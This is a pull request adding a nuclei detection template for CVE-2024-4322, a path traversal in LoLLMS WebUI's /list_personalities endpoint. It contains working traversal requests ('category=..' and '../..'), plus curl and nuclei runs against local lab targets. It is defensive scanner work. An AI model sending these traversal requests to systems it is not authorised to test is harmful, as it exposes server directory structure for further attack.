### PR TITLE
Add CVE-2024-4322-template for LoLLMS WebUI path traversal

### DIFF
--- a/http/cves/2024/CVE-2024-4322.yaml
+++ b/http/cves/2024/CVE-2024-4322.yaml
@@ -1,0 +1,67 @@
+id: CVE-2024-4322
+
+info:
+  name: LoLLMS WebUI - Path Traversal
+  author: MJ-bin
+  severity: high
+  description: |
+    A path traversal vulnerability exists in parisneo/lollms-webui within the /list_personalities endpoint. The category parameter can be manipulated to traverse outside the personalities directory and list arbitrary directories on the server.
+  impact: |
+    An unauthenticated attacker can list server directories, potentially exposing filesystem structure and sensitive folder names.
+  remediation: |
+    Upgrade LoLLMS WebUI to version 9.8 or later.
+  reference:
+    - https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4322
+    - https://osv.dev/vulnerability/CVE-2024-4322
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-4322
+    cwe-id: CWE-29
+    epss-score: 0.09825
+    epss-percentile: 0.92997
+    cpe: cpe:2.3:a:lollms:lollms_web_ui:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: lollms
+    product: lollms_web_ui
+    fofa-query: "LoLLMS WebUI - Welcome"
+  tags: cve,cve2024,lollms-webui,lollms,traversal,exposure,ai
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        internal: true
+        dsl:
+          - 'contains(body, "LoLLMS WebUI - Welcome")'
+          - 'status_code == 200'
+        condition: and
+
+  - raw:
+      - |
+        GET /list_personalities?category= HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /list_personalities?category=.. HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'contains(content_type_1, "application/json") && contains(content_type_2, "application/json")'
+          - 'body_1 != body_2'
+          - '!contains(body_1, "\"personalities_zoo\"")'
+          - 'contains(body_2, "\"personalities_zoo\"")'
+        condition: and

--- a/http/cves/2024/CVE-2024-4322.yaml
+++ b/http/cves/2024/CVE-2024-4322.yaml
@@ -1,19 +1,18 @@
 id: CVE-2024-4322
 
 info:
-  name: LoLLMS WebUI - Path Traversal
+  name: LoLLMS WebUI < 9.8 - Path Traversal
   author: MJ-bin
   severity: high
   description: |
-    A path traversal vulnerability exists in parisneo/lollms-webui within the /list_personalities endpoint. The category parameter can be manipulated to traverse outside the personalities directory and list arbitrary directories on the server.
+   parisneo/lollms-webui contains a path traversal caused by improper handling of 'category' parameter in /list_personalities endpoint, letting attackers list arbitrary directories, exploit requires control over 'category' parameter.
   impact: |
-    An unauthenticated attacker can list server directories, potentially exposing filesystem structure and sensitive folder names.
+   Attackers can list all directories on the system, leading to potential information disclosure and further exploitation.
   remediation: |
-    Upgrade LoLLMS WebUI to version 9.8 or later.
+   Implement proper input validation and sanitization for the 'category' parameter; update to the latest version with security patches.
   reference:
     - https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
     - https://nvd.nist.gov/vuln/detail/CVE-2024-4322
-    - https://osv.dev/vulnerability/CVE-2024-4322
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -24,10 +23,9 @@ info:
     cpe: cpe:2.3:a:lollms:lollms_web_ui:*:*:*:*:*:*:*:*
   metadata:
     verified: true
-    vendor: lollms
-    product: lollms_web_ui
-    fofa-query: "LoLLMS WebUI - Welcome"
-  tags: cve,cve2024,lollms-webui,lollms,traversal,exposure,ai
+    max-request: 2
+    fofa-query: body="LoLLMS WebUI - Welcome"
+  tags: cve,cve2024,lollms-webui,lollms,traversal,ai
 
 flow: http(1) && http(2)
 
@@ -38,30 +36,23 @@ http:
 
     host-redirects: true
     max-redirects: 2
+
     matchers:
       - type: dsl
-        internal: true
         dsl:
-          - 'contains(body, "LoLLMS WebUI - Welcome")'
           - 'status_code == 200'
+          - 'contains(body, "LoLLMS WebUI - Welcome")'
+        internal: true
         condition: and
 
-  - raw:
-      - |
-        GET /list_personalities?category= HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/list_personalities?category=../.."
 
-      - |
-        GET /list_personalities?category=.. HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 200 && status_code_2 == 200'
-          - 'contains(content_type_1, "application/json") && contains(content_type_2, "application/json")'
-          - 'body_1 != body_2'
-          - '!contains(body_1, "\"personalities_zoo\"")'
-          - 'contains(body_2, "\"personalities_zoo\"")'
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "\"lollms_core\"", "\"personal_data\"")'
         condition: and


### PR DESCRIPTION
Adds a nuclei template for detecting unauthenticated directory listing via the `/list_personalities` `category` parameter in LoLLMS WebUI.

The template first confirms the target by checking `/` for `LoLLMS WebUI - Welcome`, then sends two requests to `/list_personalities`: a baseline request with `category=` and a traversal request with `category=..`. It matches when both responses
are JSON `200`, the bodies differ, and only the traversal response contains `"personalities_zoo"`.

### PR Information

- Added CVE-2024-4322 template for LoLLMS WebUI path traversal / directory listing exposure.
- Vulnerable endpoint: `/list_personalities`
- Vulnerable parameter: `category`
- Remediation: upgrade LoLLMS WebUI to version 9.8 or later.
- References:
  - https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
  - https://nvd.nist.gov/vuln/detail/CVE-2024-4322
  - https://osv.dev/vulnerability/CVE-2024-4322

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against a local Docker reproduction lab:

- https://github.com/MJ-bin/POC_CVE-2024-4322

Local validation targets:

- Linux vulnerable target, LoLLMS WebUI v9.6: `http://127.0.0.1:9600`
- Linux patched target, LoLLMS WebUI v9.8: `http://127.0.0.1:9602`
- Windows vulnerable target, LoLLMS WebUI v9.6: `http://127.0.0.1:9601`
- Windows patched target, LoLLMS WebUI v9.8: `http://127.0.0.1:9603`

Template validation:

```bash
nuclei -duc -validate -t templates/CVE-2024-4322.yaml

[INF] All templates validated successfully
```
Manual request comparison on the local Linux vulnerable target:
```bash
curl -sS 'http://127.0.0.1:9600/list_personalities?category='
# []

curl -sS 'http://127.0.0.1:9600/list_personalities?category=..'
# ["personalities_zoo","extensions_zoo","bindings_zoo","models_zoo"]
```
True-positive validation:
```bash
nuclei -duc -u http://127.0.0.1:9600 -t templates/CVE-2024-4322.yaml

[CVE-2024-4322] [http] [high] http://127.0.0.1:9600/list_personalities?category=..
[INF] Scan completed ... 1 matches found.
```
False-positive validation against patched v9.8 targets:
```bash
nuclei -duc -u http://127.0.0.1:9602 -t templates/CVE-2024-4322.yaml

[INF] Scan completed ... 0 matches found.

nuclei -duc -u http://127.0.0.1:9603 -t templates\CVE-2024-4322.yaml

[INF] Scan completed ... 0 matches found.
```
The same control/traversal behavior was also validated in the Windows vulnerable Docker lab environment.

The detection checks directory listing behavior only and does not attempt to read sensitive files.

### Additional References:

- Nuclei Template Creation Guideline (https://docs.projectdiscovery.io/templates/introduction)
- Nuclei Template Matcher Guideline (https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- Nuclei Template Contribution Guideline (https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- PD-Community Discord server (https://discord.gg/projectdiscovery)
